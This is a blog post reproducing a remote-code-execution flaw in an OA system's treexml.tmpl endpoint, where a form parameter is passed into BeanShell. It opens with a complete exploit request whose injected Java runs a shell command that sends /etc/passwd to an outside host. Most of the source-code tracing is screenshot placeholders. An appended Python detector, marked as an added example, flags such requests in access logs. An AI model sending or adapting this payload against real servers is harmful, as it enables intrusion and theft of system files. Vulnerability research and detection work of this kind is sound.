keac's Blog.

Reproducing the treexml vulnerability

Word count: 313 | Reading time: 1 min
2022/08/31

Getting started

I saw an OA vulnerability that a master posted in a group chat, so I followed the source code to learn how it works.

POST /data/sys-common/treexml.tmpl HTTP/1.1
Host: xxxxx:8443
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 448

s_bean=ruleFormulaValidate&script=try {
String[] cc= { "/bin/sh", "-c", "curl -X POST -d '@/etc/passwd' http://x.x.x.x:8888/111" };
Process child = Runtime.getRuntime().exec(cc);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}

Before starting the search, be sure to add the lib folder to the project directory.

[screenshot: image-20220831105708792]

[screenshot: image-20220831105504548]

Trace down to the following, then look for IXMLDataBean.

[screenshot: image-20220831105545847]

Check which classes implement this interface.

[screenshot: image-20220831105735637]

[screenshot: image-20220831105844529]

[screenshot: image-20220831105942515]

Continue downward.

[screenshot: image-20220831110005505]

String validation

[screenshot: image-20220831110125575]

It strips trailing special characters and whitespace, then checks whether `$` is present; if it is, it repeatedly removes `$`.

[screenshot: image-20220831110351108]

After that, the string is dynamically concatenated.

[screenshot: image-20220831110642285]

bsh (BeanShell) then dynamically executes the resulting Java code.
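Since the only input check before the BeanShell call is the `$` stripping described above, the practical defensive step is to watch the endpoint itself. The following detector is an added example (not code from keac's blog or from the OA product): it reads constructed access-log lines, pulls the `script` form parameter out of POSTs to `/data/sys-common/treexml.tmpl`, undoes extra URL encoding and whitespace, and flags scripts that reference process or file APIs. The log layout (`method path status body`) and the token list are assumptions for the example.

```python
"""Flag treexml.tmpl requests whose BeanShell script reaches process or file APIs.

Added example for this write-up, not code from the blog or the OA product.
The access-log layout and the token list below are assumptions.
"""
import re
from urllib.parse import parse_qs, unquote

ENDPOINT = "/data/sys-common/treexml.tmpl"

# Tokens a formula-validation script has no business containing.
# Assumed list for the example, not a vendor rule set.
RISKY_TOKENS = (
    "Runtime.getRuntime",
    "ProcessBuilder",
    ".exec(",
    "java.io.File",
    "FileInputStream",
    "FileOutputStream",
    "Class.forName",
    "getMethod(",
)

# Constructed sample lines: "method path status body", body URL-encoded
# the way a reverse proxy or WAF would record a form POST.
SAMPLE_LOG = [
    "POST /data/sys-common/treexml.tmpl 200 s_bean=ruleFormulaValidate&script="
    "try+%7B+String%5B%5D+cc+%3D+%7B+%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22id%22+%7D%3B+"
    "Process+child+%3D+Runtime.getRuntime%28%29.exec%28cc%29%3B+%7D+catch+%28IOException+e%29+%7B%7D",
    "POST /data/sys-common/treexml.tmpl 200 s_bean=ruleFormulaValidate&script=return+1%2B1%3B",
    "GET /sys/portal/page.jsp 200 -",
    "POST /data/sys-common/treexml.tmpl 200 s_bean=sysTimeBean&script=",
]


def normalise(script):
    """Undo up to two extra layers of percent-encoding, then drop all whitespace
    so spacing tricks do not defeat the substring checks."""
    for _ in range(2):
        decoded = unquote(script)
        if decoded == script:
            break
        script = decoded
    return re.sub(r"\s+", "", script)


def analyze_request(method, path, body):
    """Return {"s_bean": ..., "tokens": [...]} for a treexml POST, else None."""
    if method != "POST" or path.split("?", 1)[0] != ENDPOINT:
        return None
    params = parse_qs(body, keep_blank_values=True)  # decodes %xx and '+'
    script = normalise(params.get("script", [""])[0])
    tokens = [t for t in RISKY_TOKENS if t in script]
    return {"s_bean": params.get("s_bean", [""])[0], "tokens": tokens}


def parse_line(line):
    """Split an assumed 'method path status body' log line; body is the rest."""
    parts = line.split(" ", 3)
    if len(parts) != 4:
        return None
    method, path, status, body = parts
    return method, path, status, body


def scan_log(lines):
    """Return one finding per treexml POST whose script hits a risky token."""
    findings = []
    for number, line in enumerate(lines, start=1):
        parsed = parse_line(line)
        if parsed is None:
            continue
        method, path, _status, body = parsed
        result = analyze_request(method, path, body)
        if result and result["tokens"]:
            findings.append({"line": number, "s_bean": result["s_bean"],
                             "tokens": result["tokens"]})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"line {finding['line']}: s_bean={finding['s_bean']} "
              f"tokens={finding['tokens']}")
```

Only the first sample line is reported; the arithmetic formula on line 2 and the empty script on line 4 pass through, which is the point of matching on API names rather than on any use of the endpoint. Treat a hit as a trigger for pulling the full request body and the process tree of the JVM at that time, not as proof on its own.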
